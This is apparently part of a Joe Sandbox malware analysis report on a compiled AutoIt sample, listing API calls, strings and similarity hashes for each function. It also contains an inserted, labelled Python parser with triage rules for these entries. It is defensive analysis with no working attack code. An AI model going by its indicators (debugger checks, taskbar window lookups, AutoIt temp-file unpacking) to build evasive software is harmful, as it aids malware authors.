Similarity
• API ID: _wcslen
• String ID: 3, 3, 16, 1
• API String ID: 176396367-3042988571
• Opcode ID: f9668d50f532d7f26057f1635cdab80442baf03dbc87ceb82586c05dcd700074
• Instruction ID: c740ac13662d416fe00fa1c66d6012b5d101d8bf52b52b5e8494717225cd4ac9
• Opcode Fuzzy Hash: f9668d50f532d7f26057f1635cdab80442baf03dbc87ceb82586c05dcd700074
• Instruction Fuzzy Hash: 32E02B023182205092311279FCC29BF5689DFC5751714182FFE95C62E7EBD48D91A3A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00130B23
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message
                                                                                                                                                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                          • Opcode ID: 8fcba64ead496c18e8d8f765380fedd174d36c8820f762edbbefe6e0d8da373c
                                                                                                                                                                                                                                          • Instruction ID: dd4d26a99be8aa32544452687a566af1b8fbba0214cdd63d674f4271af9163b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fcba64ead496c18e8d8f765380fedd174d36c8820f762edbbefe6e0d8da373c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42E0DF322883492AD31036957C03FE9BA858F09B24F10442AFB88B59C38BE324A056E9
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000F0D71,?,?,?,000D100A), ref: 000EF7CE
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,000D100A), ref: 000F0D75
                                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000D100A), ref: 000F0D84
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000F0D7F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                          • API String ID: 55579361-631824599
                                                                                                                                                                                                                                          • Opcode ID: d3b5a38b4bf4cc32cf9807bb9bfebcc71aff0b4934d36091bb9babb596521761
                                                                                                                                                                                                                                          • Instruction ID: 70e61b863f62a30b47d030e800f3d17d2be738e5690106a37534cf7b30420b19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b5a38b4bf4cc32cf9807bb9bfebcc71aff0b4934d36091bb9babb596521761
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59E06D742003518BD7609FB8E808366BBE4AF04745F00892DE986C6A52EBB6E4848BA1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0014302F
                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00143044
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                          • String ID: aut
                                                                                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                          • Opcode ID: 43f68ddc5b1cc1d580da7a0d53dd6d93d4b2ee2fa26c3553f75418bab4914d22
                                                                                                                                                                                                                                          • Instruction ID: 5be8da7b5fd1840ebe3a22d60282a02bbcb4498da612574a27db646e00af3fd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43f68ddc5b1cc1d580da7a0d53dd6d93d4b2ee2fa26c3553f75418bab4914d22
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD05E7250132867DA20A7A4EC0EFDB7A7CDB04750F0002A2BA95E2091DAF49984CAE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
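The function entries on this page share one fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, Uniqueness), which makes them easy to mine for indicators across a whole report. The Python below is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses that layout and applies a few triage rules to what these entries show. Two points the rules encode: GetTempPathW followed by GetTempFileNameW with the prefix "aut" is the compiled-AutoIt runtime writing its unpacked payload to %TEMP%\aut*.tmp, consistent with the "Binary is likely a compiled AutoIt script file" signature; and the IsDebuggerPresent call paired with the string "ERROR : Unable to initialize critical section in CAtlBaseModule" is the failure path of the ATL CAtlBaseModule constructor, so it should not be counted as anti-debugging on its own. The rule labels and the FunctionEntry structure are this example's own; SAMPLE_REPORT is a constructed excerpt of four entries from this page; the regular expression assumes one call per line and no commas inside string arguments.

```python
"""Parser and triage rules for the per-function "APIs / Strings / Similarity / Uniqueness"
entries of a Joe Sandbox report. Added example: neither Joe Sandbox code nor the sample's."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Section headers exactly as printed in the report; "APIs" opens a new function entry.
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# Matches "MessageBoxW.USER32(00000000,...,AutoIt,00000010), ref: 00130B23" and
# "Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3".
# Assumption: one call per line and no commas inside string arguments.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?"
    r"(?:,? ref: (?P<ref>[0-9A-Fa-f]+))?$")
# "ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000F0D7F"
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")


@dataclass
class FunctionEntry:
    apis: List[Dict] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)  # API ID, String ID, fuzzy hashes
    uniqueness: Optional[float] = None


def parse_report(text: str) -> List[FunctionEntry]:
    entries: List[FunctionEntry] = []
    section, cur = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if section == "APIs":
                cur = FunctionEntry()
                entries.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
                cur.apis.append({"name": m.group("name"), "module": m.group("module"), "args": args,
                                 "ref": m.group("ref"), "subcall": m.group("subfn")})
        elif section == "Strings":
            m = STRING_RE.match(body)
            cur.strings.append(m.group("text") if m else body)
        elif section == "Similarity":
            key, sep, val = body.partition(": ")
            if sep:
                cur.similarity[key] = val
    return entries


def triage(entry: FunctionEntry) -> List[str]:
    """Labels are the editor's own; each rule encodes one observation from this report."""
    flags: List[str] = []
    for a in entry.apis:
        # The AutoIt runtime unpacks via GetTempFileName with prefix "aut" (%TEMP%\aut*.tmp).
        if a["name"].startswith("GetTempFileName") and "aut" in a["args"]:
            flags.append("autoit_temp_file")
        if a["name"].startswith("MessageBox") and "AutoIt" in a["args"]:
            flags.append("autoit_runtime_messagebox")
        if a["name"].startswith("FindWindow") and "Shell_TrayWnd" in a["args"]:
            flags.append("taskbar_window_lookup")
    if any(a["name"] == "IsDebuggerPresent" for a in entry.apis):
        # ATL's CAtlBaseModule constructor calls IsDebuggerPresent only to decide whether to
        # emit its init-failure message: library boilerplate, not an evasion check.
        if any("CAtlBaseModule" in s for s in entry.strings):
            flags.append("atl_startup_boilerplate")
        else:
            flags.append("anti_debug_candidate")
    return flags


# Constructed excerpt in the report's own layout (four entries from this page, with the
# page indentation removed); used as offline input for the parser.
SAMPLE_REPORT = """
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00130B23
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 000EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000F0D71,?,?,?,000D100A), ref: 000EF7CE
• IsDebuggerPresent.KERNEL32(?,?,?,000D100A), ref: 000F0D75
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000D100A), ref: 000F0D84
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000F0D7F
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0014302F
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00143044
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
Uniqueness
Uniqueness Score: -1.00%
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0016233F
  • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
Uniqueness
Uniqueness Score: -1.00%
"""
```

Feed parse_report the text of a whole report section rather than the excerpt; the Similarity fields (API ID, String ID, fuzzy hashes) and the uniqueness score are kept on each entry so that functions can be matched across samples, and the anti_debug_candidate label is deliberately weak because a lone IsDebuggerPresent call proves little without the surrounding strings and control flow.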

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: 1e98d3954c983cb02f4adf59bdb7b8533b489bb91bd7d9912bb6df993fe6b188
• Instruction ID: 6612ef09e9333f423a4bfc8108ccf88367d4f378d8b7f2032faa87a879bb41b2
• Opcode Fuzzy Hash: 1e98d3954c983cb02f4adf59bdb7b8533b489bb91bd7d9912bb6df993fe6b188
• Instruction Fuzzy Hash: 7ED01271808129E9CB5497E0FC459F9B37CFB18341F618452F806A1040D724C568A761
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016232C
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0016233F
  • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 8a4bf0beea032578cd4af2f87d02708bed152b0fbef3545bb4378bb5138f1046
• Instruction ID: 1d9c554253f6d3b81a98ce5bbb087733f70ce5d8e40afd42b4b5011d454f0d82
• Opcode Fuzzy Hash: 8a4bf0beea032578cd4af2f87d02708bed152b0fbef3545bb4378bb5138f1046
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AD012363D4310B7EA68B770EC0FFD67A549B14B14F004916B786AA1D0CAF0A841CB94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0016236C
• PostMessageW.USER32(00000000), ref: 00162373
  • Part of subcall function 0013E97B: Sleep.KERNEL32 ref: 0013E9F3
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 4cfc69215fda5e9aed9a0ed2bc74eb211aa0656a5a3ea058e5d9c1830919dc31
• Instruction ID: f645909d97405caf2ef9e46520d852cd4a5b0e794cab4fdea6f430edf5b3c3dd
• Opcode Fuzzy Hash: 4cfc69215fda5e9aed9a0ed2bc74eb211aa0656a5a3ea058e5d9c1830919dc31
• Instruction Fuzzy Hash: 15D012323C13107BEA68B770EC0FFD67A549B14B14F004916B786EA1D0CAF0B841CB98
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0010BE93
• GetLastError.KERNEL32 ref: 0010BEA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0010BEFC
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 294c557f1bb9dc5556bce7ac05c456833d4c3e708bc0e03e0bec87295fb1da58
• Instruction ID: a026c153c1ca4d90deb71347a76c8fa582e196afdd7baad3f9eeebe443a94b15
• Opcode Fuzzy Hash: 294c557f1bb9dc5556bce7ac05c456833d4c3e708bc0e03e0bec87295fb1da58
• Instruction Fuzzy Hash: D041C534609207AFCF258F64CCD4ABA7BA5EF42710F154169FAD9971E1DBB08D01DB60
Uniqueness
• Uniqueness Score: -1.00%